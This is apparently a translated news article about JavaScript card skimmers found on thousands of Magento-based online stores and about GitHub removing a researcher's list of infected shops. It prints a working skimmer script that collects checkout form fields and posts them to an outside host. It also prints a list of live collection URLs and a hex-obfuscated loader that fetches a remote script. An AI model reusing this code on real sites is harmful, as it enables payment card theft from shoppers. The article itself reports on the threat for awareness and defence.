Github deletes the list of 5925 online stores with JS-skimmers installed

Online skimming is a relatively new form of bank card fraud. The essence is clear from the title. If a regular skimmer is an overlay on an ATM card collector that dumps a magnetic strip, then an online skimmer is a software tab on an online store server that passively intercepts payment data while it is entered by the user into text fields in the browser. Until now, cardders have concentrated mainly on transaction servers, where encryption is used, but in this case the information is removed before encryption. Then information about payment cards is sold on underground forums: usually, an outsider can make payments using these cards.

Security experts at Nightly Secure say that online skimming has been gaining popularity recently. For the first time about the spread of such fraud started talking in 2015 . As of November 2015, from the list of 255,000 online stores, 3501 stores with JS bookmarks on the server were discovered. During the year their number increased by 69%.

A sample javascript bookmark for intercepting payment data looks like this (in this case, the information is sent to http://ownsafety.org/opp.php ):
')

 <script>// <![CDATA[ // whitespace added for readability --wdg function j(e) { var t = "; " + document.cookie, o = t.split("; " + e + "="); return 2 == o.length ? o.pop().split(";").shift() : void 0 } j("SESSIID") || (document.cookie = "SESSIID=" + (new Date).getTime()), jQuery(function(e) { e("button").on("click", function() { var t = "", o = "post", n = window.location; if (new RegExp("onepage|checkout").test(n)) { for (var c = document.querySelectorAll("input, select, textarea, checkbox"), i = 0; i < c.length; i++) if (c[i].value.length > 0) { var a = c[i].name; "" == a && (a = i), t += a + "=" + c[i].value + "&" } if (t) { var l = new RegExp("[0-9]{13,16}"), u = new XMLHttpRequest; u.open(o, e(" <div />").html("http://ownsafety.org/opp.php").text(), !0), u.setRequestHeader("Content-type", "application/x-www-form-urlencoded"), u.send(t + "&asd=" + (l.test(t.replace(/s/g, "")) ? 1 : 0) + "&utmp=" + n + "&cookie=" + j("SESSIID")), console.clear() } } }) }); // ]]></script> 

Last year, researchers compiled a list of the most frequently used addresses for data collection:

 1860 https://ownsafety.org/opp.php 390 http://ownsafety.org/opp.php 309 https://useagleslogistics.com/gates/jquery.php 100 https://redwiggler.org/wp-content/themes/jquerys.php 70 https://clickvisits.biz/xrc.php 28 https://gamula.eu/jquery.php 23 https://gamula.ru/order.php 22 https://news-daily.me/gt/ 20 https://antaras.xyz/jquery.php 17 https://clicksale.xyz/xrc.php 10 https://ausfunken.com/service/css.php 9 http://www.dobell.com/var/extendware/system/licenses/encoder/mage_ajax.php 5 https://redwiggler.org/wp-content/themes/jquery.php 1 /js/index.php 1 /js/am/extensions/sitemap_api.php 1 https://infopromo.biz/lib/jquery.php 1 https://google-adwords-website.biz/gates/jquery.php 1 https://bandagesplus.com/order.php 1 http://nearart.com/order.php 1 http://happysocks.in/jquery.pl 

In almost all cases, small versions of the same code are used.

Such a tab is quite difficult to detect on the server. The code is loaded from the CMS and works in the browser. At the three and a half thousand sites mentioned last year, she worked for several months, for many six months and more.

Experts believe that a large number of infected servers indicates a high degree of attack automation. This is done not by some script kiddies, but by good professionals. Probably from Russia.

For the introduction of bookmarks used vulnerabilities in the software of online stores. First of all, this is the vulnerable Magento Commerce software. It is through it that the easiest way to implement the CMS code, although in fact this code can work in any online store that does not necessarily use Magento. Check the online store for vulnerabilities on MageReports.com .

Although the problem was raised a year ago, over the past year it has not disappeared anywhere. Worse, the infected online stores became one and a half times larger. In March 2016, the number of stores with skimmers increased from 3,501 to 4,476, and in September 2016 - to 5,925.

The guys from Nightly Secure published a list of all infected stores to warn customers - and notify the administrators of these stores about the vulnerability. Indeed, among them were quite popular sites, including the branches of automakers (Audi ZA), government organizations (NRSC, Malaysia), sites of popular musicians (Bjork), and non-profit organizations (Science Museum, Washington Cathedral).

If a year ago almost all stores used small modifications of the same online skimmer, now researchers have already found 9 separate script varieties belonging to 3 different families ( samples code on Github ).

The attackers have become smarter and now use multi-level code obfuscation, which is not so easy to disassemble. For example, the script may be masked like this:



Real malware code:

 <script language="javascript">window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x73\x63\x72'+'\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x69\x70\x2e\x35\x75\x75\x38\x2e\x63\x6f\x6d\x2f\x69\x70\x2f\x69\x70\x5f'+'\x34\x30\x37\x39\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72'+'\x69\x70\x74\x3e');//4079</script> 

The authors also improved the mechanism for intercepting payment card data. If earlier, the malware simply intercepted pages with the checkout string in the URL, then now it already recognizes the popular payment plugins Firecheckout, Onestepcheckout and Paypal.

Specialists from Nightly Secure tried to contact a number of stores (about 30) and inform them about the installed skimmer, but did not receive a response from most of the stores, while others showed surprising carelessness. One said that this is not his problem, because payments are processed by a third-party company. The second said that it was just a Javascript error, not a threat. The third one said at all that there can be no danger, because “the store works on HTTPS”. The author submitted a list of stores with skimmers to Google for blacklisting Chrome Safe Browsing.

A list of all stores with skimmers was originally published on Github . And here the most interesting began. Soon, Github, without warning, deleted from his site the publication of the results of a study of online stores .

Apparently, Github censored the standard procedure, receiving a DMCA request from one of the stores. Of course, the store is unpleasant when they find it vulnerable and tell the whole world.

Yesterday, the author moved the results of the research of the safety of online stores to Gitlab hosting . Today, a page at this address returns error 404. A few hours ago, the author received a letter from Gitlab explaining the reasons for the deletion. According to the administration, the publication of the list of vulnerable stores is considered as a “blatant case” that cannot be resolved. Therefore, the list has been deleted (UPD: access restored , Gitlab director apologized).

Copy of the list in the web archive
Copy on pastebin

Note that the list of stores with installed online skimmers lists 44 domains in the .RU zone.

Hopefully, the administrators of these stores will quickly install a version of Magento with the latest patches and compensate for losses to customers who have copies of payment cards leaked to the black market.